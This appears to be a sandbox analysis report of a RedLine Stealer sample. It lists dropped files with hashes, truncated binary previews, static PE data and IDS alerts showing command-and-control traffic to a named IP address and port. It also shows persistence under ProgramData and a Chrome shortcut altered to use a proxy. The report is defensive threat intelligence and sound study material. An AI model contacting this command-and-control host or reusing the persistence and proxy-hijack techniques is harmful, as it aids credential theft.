                                                    Entropy (8bit):7.9999867308608685
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:7106B8DDE9093C302EB124DDBB6E4C81
                                                    SHA1:91F6869402D85A6AAD92DE3C4B828C7CBB763B78
                                                    SHA-256:3B972C8C45C30705F1BA7FFEC7E73C292690BAFD0729B2030F33BAFBB120B16D
                                                    SHA-512:61C94466385B80A3923E7847C045CF5777C25FF1957AED353DE68024FE4F0E7E71BF811BA55F60DC0D7BCA0248BFC19588C2BEDD2E5BCAA696F0E597AFA12B54
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o............."...0.................. ........@.. ....................................`.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........P...j...........O..p.............................................(....*.*z.,..{....,..{....oJ.....(K...*.(E...,.(=...*(V...o>...~....()...*V(W...(V...o>...(`...*6.|.....(....*.~....-.r...p.....(7...o....s.........~....*.~....*.......*.~....*..(....*Vs....(....t.........*6.|"....(....*6.|+....(....*.....*.(....~/...%-.&~......(...s....%./...(....t....(.... ....(....*.s'........*......(#...*J~....,.(>...(?...*V(....s.... ...o....*6.|:....(....*2.(M...}>...*..(F...*..(

                                                    C:\ProgramData\Path\SjWVsguZ-OtOFt52U.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\Temp\filename.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):256
                                                    Entropy (8bit):5.752818171346496
                                                    Encrypted:false
                                                    SSDEEP:6:kDrimnqLdrt8DsgyeG87EGHn2lKl966QYMsDgAjvW:WpnOXdeGhK/6FsDgATW
                                                    MD5:7FB820E0D7BF5F3C8405CE6F6BE73BB2
                                                    SHA1:4BC96F498E458C151B5A60EEFCCE4559A8A2081E
                                                    SHA-256:17B9FF8A388107D09295CFFA07E9CC5B16117E9CDC1E68AFADFE58BD3DF4DAFC
                                                    SHA-512:AD0DD8834756126D41FE3F56768B3C742760BF92AA4E35A7AFBC559F6FC23EB2DF1712AC2AE1B84BCF2752BD90A14B17B44A9FE517DFA30210B6EC5C066371AB
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:l6lu67m6eTHCjQwUEOqHS0LEOJ4qW1G9BOyTjWRU6a1YZr0873BePvBuvhfwD6jnNIBUcdvr6VK29xpgT6tdzltPNDhC1eRA0NLRqgfdITi4kJv729dGMGxmYvGY5t0cDKCvmY0xaPVfDypESjJ2BKxtZi24ZHiZdF0aG9VeIqq6vRijGCGVj8a3WSVDf5XSr6C78P7SOptUd08IASyWBMzfo7DxnS8MSXPzPll0ExH4OGZgUNDNHBReGhSBLKp5

                                                    C:\Users\Public\Desktop\Google Chrome.lnk

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 06:54:42 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
                                                    Category:dropped
                                                    Size (bytes):2104
                                                    Entropy (8bit):3.4766164362209806
                                                    Encrypted:false
                                                    SSDEEP:48:8S8M7dvTgtX0lRYrnvPdAKRkdAGdAKRFdAKRr:8S8ocR7
                                                    MD5:746BCAA67BB0E9B7CA166EF6A34A87D6
                                                    SHA1:C4E0B3E9DDDF8D06A21852410F392D1F03506587
                                                    SHA-256:82A2FB192F6D1FFF9081FFCF3E71BFBD49895F544C7FAFC1D5C4D61A0EDFF8B9
                                                    SHA-512:3CA6E88EA1A50D43610A2EA35E7ACA23E896CF31CA44231D295A44A98AB24C71855D407D57BC760E183B11D22F9D681DC5AECE5C7C4DFE90390F83D728E10893
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:L..................F.@.. ......,....p..2a....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.=..PROGRA~1..t......O.IEW.>....B...............J.......z.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW.8....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.8..Chrome..>......CW.VEW.8....M.....................>.i.C.h.r.o.m.e.....`.1.....EW.8..APPLIC~1..H......CW.VEW.8..........................>.i.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.>..........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\66dcad8f5f33a_crypted.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):42
                                                    Entropy (8bit):4.0050635535766075
                                                    Encrypted:false
                                                    SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                    MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                    SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                    SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                    SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Path.exe.log

                                                    Download File
                                                    Process:C:\ProgramData\Path\Path.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):826
                                                    Entropy (8bit):5.353295152847208
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KiE4Kx1qE4qpsXE4qdKtKDE4KhKiKhk:MxHKiHKx1qHpH7YHKh3ok
                                                    MD5:BC7BBBF9FA4F719337912AD654BD516C
                                                    SHA1:42D89CA1E7D1FBAE6C133194C2D4F215F979929E
                                                    SHA-256:2954BF16BD5A7F78256CB60BCA41A09851473C07BB84EE033C5B3872D8B96F1F
                                                    SHA-512:529632FC06F87C6A220074CC22D5290F7992753A3A25F089F15A5D6A5A801FFDD94FE0CBC32904FD5EA52720F3298C1B1EA5D6EECC99BAB78DA05772F00D629B
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):3274
                                                    Entropy (8bit):5.3318368586986695
                                                    Encrypted:false
                                                    SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                    MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                    SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                    SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                    SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    C:\Users\user\AppData\Local\Temp\TmpECBC.tmp

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2662
                                                    Entropy (8bit):7.8230547059446645
                                                    Encrypted:false
                                                    SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                    MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                    SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                    SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                    SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                    Malicious:false
                                                    Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                    C:\Users\user\AppData\Local\Temp\TmpECCC.tmp

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2662
                                                    Entropy (8bit):7.8230547059446645
                                                    Encrypted:false
                                                    SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                    MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                    SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                    SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                    SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                    Malicious:false
                                                    Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                    C:\Users\user\AppData\Local\Temp\filename.exe

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):436224
                                                    Entropy (8bit):4.668285224972668
                                                    Encrypted:false
                                                    SSDEEP:6144:Ve5JhHX4bjZOTHP7ejzue8RW033b7EoswWit23GQ/qBZZH1hK0c/p49fhT93BhIP:Ve5D3aC7WuFPckbU25BZZu0SM3XIo
                                                    MD5:556A8B2AFEF96F81ACDE6CA1A525650E
                                                    SHA1:262909E4686ABA13DE7CA5A2BF187871FC4FE63B
                                                    SHA-256:B867D368D4597334A036B46816473BE270D6779DB2428AAE75053AF8CACF1E85
                                                    SHA-512:52A954CF545B6BFC2057A09B858074BD1DCEDD75A3983DFF14BC9E72B2DA47C375F30568A9310E2751E57291E9186B39D5B8D228F855102631AB95F9743B33D9
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Joe Sandbox View:
                                                    • Filename: gobEmOm5sr.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o............."...0.................. ........@.. ....................................`.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........P...j...........O..p.............................................(....*.*z.,..{....,..{....oJ.....(K...*.(E...,.(=...*(V...o>...~....()...*V(W...(V...o>...(`...*6.|.....(....*.~....-.r...p.....(7...o....s.........~....*.~....*.......*.~....*..(....*Vs....(....t.........*6.|"....(....*6.|+....(....*.....*.(....~/...%-.&~......(...s....%./...(....t....(.... ....(....*.s'........*......(#...*J~....,.(>...(?...*V(....s.... ...o....*6.|:....(....*2.(M...}>...*..(F...*..(

                                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2251
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:0158FE9CEAD91D1B027B795984737614
                                                    SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                    SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                    SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    \Device\Null

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\timeout.exe
                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                    Category:dropped
                                                    Size (bytes):66
                                                    Entropy (8bit):4.524640141725149
                                                    Encrypted:false
                                                    SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                    MD5:04A92849F3C0EE6AC36734C600767EFA
                                                    SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                    SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                    SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                    Malicious:false
                                                    Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.9857704445863105
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:66dcad8f5f33a_crypted.exe
                                                    File size:320'512 bytes
                                                    MD5:b8010780cbccba9ec2e20d7b3c17c6be
                                                    SHA1:30904082c6866796d664f0042780207c5fcf59ba
                                                    SHA256:49c25f225e9c5a3ffb651a2ede3505b0faccfbef4f43652d7321388ce6c4b864
                                                    SHA512:a98c9acbb1be1802ab2b430fee7aaf0db166ca3dc25b728c6da7535ce884f9dfbef63f45cac55f4ed208630da8f587378ddf5504e5479b85eec62e4d84460205
                                                    SSDEEP:6144:GwWRWpJv0YaCeIplG59br5OZ3p2GAbdZCHZnHUCy9X/qWCGGUJEqY3nfT5B/b6Bf:GwAWXx5eIplObs3peSHtHUCWX/qWvVYk
                                                    TLSH:0B64230B65AA63EAE9792FF161228305B340F3965D1A037A7DE35BB36270D80DC171E3
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ........@.. .......................@............`................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x44f6ae
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows cui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66DC731B [Sat Sep 7 15:36:59 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4f6580x53.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x610.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x520000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x4f5200x1c.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x4d6b40x4d80069ad1f956a538c32d2c5f5dd2407e2a0False0.9939358618951613data7.995826801041677IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x500000x6100x80050963380576a0a499255343e9f371391False0.34716796875data3.418744367040111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x520000xc0x2006ab98d9e1a6d7f97b8937a6484a52c9bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0x500a00x37cdata0.4551569506726457
                                                    RT_MANIFEST0x504200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-09-08T14:56:29.917700+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:29.917700+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:30.164427+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response15.42.92.2227880192.168.2.749707TCP
                                                    2024-09-08T14:56:35.215382+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:35.430165+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)15.42.92.2227880192.168.2.749707TCP
                                                    2024-09-08T14:56:35.557609+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:35.854781+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:36.918874+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:37.263855+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:37.524282+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:37.554788+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:37.939834+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:38.470543+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:38.685058+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:38.938275+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:39.153125+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:39.372179+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:40.058746+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:40.270959+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:40.481745+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:40.692023+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
                                                    2024-09-08T14:56:40.905295+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.7497075.42.92.2227880TCP
